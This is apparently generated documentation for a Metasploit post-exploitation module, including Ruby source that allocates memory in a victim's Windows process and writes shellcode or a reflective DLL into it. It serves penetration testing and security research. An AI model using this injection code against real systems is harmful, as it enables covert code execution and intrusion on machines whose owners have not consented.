Module: Msf::Post::Windows::ReflectiveDLLInjection

Includes: ReflectiveDLLLoader
Included in: Process
Defined in: lib/msf/core/post/windows/reflective_dll_injection.rb

Overview

This module exposes functionality which makes it easier to do Reflective DLL Injection into processes on a victim's machine.

Constant Summary

PAGE_ALIGN = 1024

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary

Methods included from ReflectiveDLLLoader

#load_rdi_dll, #load_rdi_dll_from_data

Instance Method Details

#inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array

Inject a reflectively-injectable DLL into the given process using reflective injection.

Parameters:

Returns:

  • (Array)

    Tuple of allocated memory address and offset to the ReflectiveLoader function.


# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 64

def inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
  # Locate the offset of the loader export inside the in-memory DLL data.
  offset = load_rdi_dll_from_data(dll_data, loader_name: loader_name, loader_ordinal: loader_ordinal)
  # Copy the DLL data into the target process and keep the allocated address.
  dll_mem = inject_into_process(process, dll_data)

  return dll_mem, offset
end

#inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array

Inject a reflectively-injectable DLL into the given process using reflective injection.

Parameters:

Returns:

  • (Array)

    Tuple of allocated memory address and offset to the ReflectiveLoader function.


# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 48

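def inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
  # Read the DLL from disk and locate the offset of the loader export.
  dll, offset = load_rdi_dll(dll_path, loader_name: loader_name, loader_ordinal: loader_ordinal)
  # Copy the DLL data into the target process and keep the allocated address.
  dll_mem = inject_into_process(process, dll)

  return dll_mem, offset
end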

#inject_into_process(process, shellcode) ⇒ Integer

Inject the given shellcode into a target process.

Parameters:

Returns:

  • (Integer)

    Address of the shellcode in the target process's memory.


# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 25

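def inject_into_process(process, shellcode)
  shellcode_size = shellcode.length

  # Round the allocation size up to the next multiple of PAGE_ALIGN.
  unless shellcode.length % PAGE_ALIGN == 0
    shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN)
  end

  # Allocate the region in the target process, set its protection
  # (using the call's default arguments), and write the data into it.
  shellcode_mem = process.memory.allocate(shellcode_size)
  process.memory.protect(shellcode_mem)
  process.memory.write(shellcode_mem, shellcode)

  # Address of the written data in the target process's memory.
  return shellcode_mem
end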